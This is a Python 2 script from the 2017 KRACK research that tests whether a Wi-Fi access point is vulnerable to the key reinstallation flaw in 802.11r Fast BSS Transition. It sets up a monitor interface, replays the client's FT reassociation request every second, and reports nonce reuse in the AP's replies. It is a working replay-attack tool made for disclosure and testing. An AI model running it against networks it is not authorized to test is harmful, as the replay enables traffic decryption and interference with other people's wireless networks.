krack-ft-test.py 5.8 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168
  1. #!/usr/bin/env python2
  2. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  3. #
  4. # This code may be distributed under the terms of the BSD license.
  5. # See LICENSE for more details.
  6. import logging
  7. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  8. from scapy.all import *
  9. from libwifi import *
  10. import sys, socket, struct, time, subprocess, atexit, select
  11. IEEE_TLV_TYPE_RSN = 48
  12. IEEE_TLV_TYPE_FT = 55
  13. IEEE80211_RADIOTAP_RATE = (1 << 2)
  14. IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
  15. IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
  16. IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
  17. #TODO: - Merge code with client tests to avoid code duplication (including some error handling)
  18. #TODO: - Option to use a secondary interface for injection + WARNING if a virtual interface is used + repeat advice to disable hardware encryption
  19. #TODO: - Test whether injection works on the virtual interface (send probe requests to nearby AP and wait for replies)
  20. #### Man-in-the-middle Code ####
  21. class KRAckAttackFt():
  22. def __init__(self, interface):
  23. self.nic_iface = interface
  24. self.nic_mon = interface + "mon"
  25. self.clientmac = scapy.arch.get_if_hwaddr(interface)
  26. self.sock = None
  27. self.wpasupp = None
  28. self.reset_client()
  29. def reset_client(self):
  30. self.reassoc = None
  31. self.ivs = IvCollection()
  32. self.next_replay = None
  33. def start_replay(self, p):
  34. assert Dot11ReassoReq in p
  35. self.reassoc = p
  36. self.next_replay = time.time() + 1
  37. def process_frame(self, p):
  38. # Detect whether hardware encryption is decrypting the frame, *and* removing the TKIP/CCMP
  39. # header of the (now decrypted) frame.
  40. # FIXME: Put this check in MitmSocket? We want to check this in client tests as well!
  41. if self.clientmac in [p.addr1, p.addr2] and Dot11WEP in p:
  42. # If the hardware adds/removes the TKIP/CCMP header, this is where the plaintext starts
  43. payload = str(p[Dot11WEP])
  44. # Check if it's indeed a common LCC/SNAP plaintext header of encrypted frames, and
  45. # *not* the header of a plaintext EAPOL handshake frame
  46. if payload.startswith("\xAA\xAA\x03\x00\x00\x00") and not payload.startswith("\xAA\xAA\x03\x00\x00\x00\x88\x8e"):
  47. log(ERROR, "ERROR: Virtual monitor interface doesn't seem to pass 802.11 encryption header to userland.")
  48. log(ERROR, " Try to disable hardware encryption, or use a 2nd interface for injection.", showtime=False)
  49. quit(1)
  50. # Client performing a (possible new) handshake
  51. if self.clientmac in [p.addr1, p.addr2] and Dot11Auth in p:
  52. self.reset_client()
  53. log(INFO, "Detected Authentication frame, clearing client state")
  54. elif p.addr2 == self.clientmac and Dot11ReassoReq in p:
  55. self.reset_client()
  56. if get_tlv_value(p, IEEE_TLV_TYPE_RSN) and get_tlv_value(p, IEEE_TLV_TYPE_FT):
  57. log(INFO, "Detected FT reassociation frame")
  58. self.start_replay(p)
  59. else:
  60. log(INFO, "Reassociation frame does not appear to be an FT one")
  61. elif p.addr2 == self.clientmac and Dot11AssoReq in p:
  62. log(INFO, "Detected normal association frame")
  63. self.reset_client()
  64. # Encrypted data sent to the client
  65. elif p.addr1 == self.clientmac and Dot11WEP in p:
  66. iv = dot11_get_iv(p)
  67. log(INFO, "AP transmitted data using IV=%d (seq=%d)" % (iv, dot11_get_seqnum(p)))
  68. if self.ivs.is_iv_reused(p):
  69. log(INFO, ("IV reuse detected (IV=%d, seq=%d). " +
  70. "AP is vulnerable!") % (iv, dot11_get_seqnum(p)), color="green")
  71. self.ivs.track_used_iv(p)
  72. def handle_rx(self):
  73. p = self.sock.recv()
  74. if p == None: return
  75. self.process_frame(p)
  76. def configure_interfaces(self):
  77. log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
  78. # 0. Some users may forget this otherwise
  79. subprocess.check_output(["rfkill", "unblock", "wifi"])
  80. # 1. Remove unused virtual interfaces to start from a clean state
  81. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  82. # 2. Configure monitor mode on interfaces
  83. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  84. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  85. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  86. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  87. time.sleep(0.5)
  88. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  89. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  90. def run(self):
  91. self.configure_interfaces()
  92. self.sock = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  93. # Open the wpa_supplicant client that will connect to the network that will be tested
  94. self.wpasupp = subprocess.Popen(sys.argv[1:])
  95. # Monitor the virtual monitor interface of the client and perform the needed actions
  96. while True:
  97. sel = select.select([self.sock], [], [], 1)
  98. if self.sock in sel[0]: self.handle_rx()
  99. if self.reassoc and time.time() > self.next_replay:
  100. log(INFO, "Replaying Reassociation Request")
  101. self.sock.send(self.reassoc)
  102. self.next_replay = time.time() + 1
  103. def stop(self):
  104. log(STATUS, "Closing wpa_supplicant and cleaning up ...")
  105. if self.wpasupp:
  106. self.wpasupp.terminate()
  107. self.wpasupp.wait()
  108. if self.sock: self.sock.close()
  109. def cleanup():
  110. attack.stop()
  111. def argv_get_interface():
  112. for i in range(len(sys.argv)):
  113. if not sys.argv[i].startswith("-i"):
  114. continue
  115. if len(sys.argv[i]) > 2:
  116. return sys.argv[i][2:]
  117. else:
  118. return sys.argv[i + 1]
  119. return None
  120. if __name__ == "__main__":
  121. if len(sys.argv) <= 1 or "--help" in sys.argv or "-h" in sys.argv:
  122. print "See README.md for instructions on how to use this script"
  123. quit(1)
  124. # TODO: Verify that we only accept CCMP?
  125. interface = argv_get_interface()
  126. if not interface:
  127. log(ERROR, "Failed to determine wireless interface. Specify one using the -i parameter.")
  128. quit(1)
  129. attack = KRAckAttackFt(interface)
  130. atexit.register(cleanup)
  131. attack.run()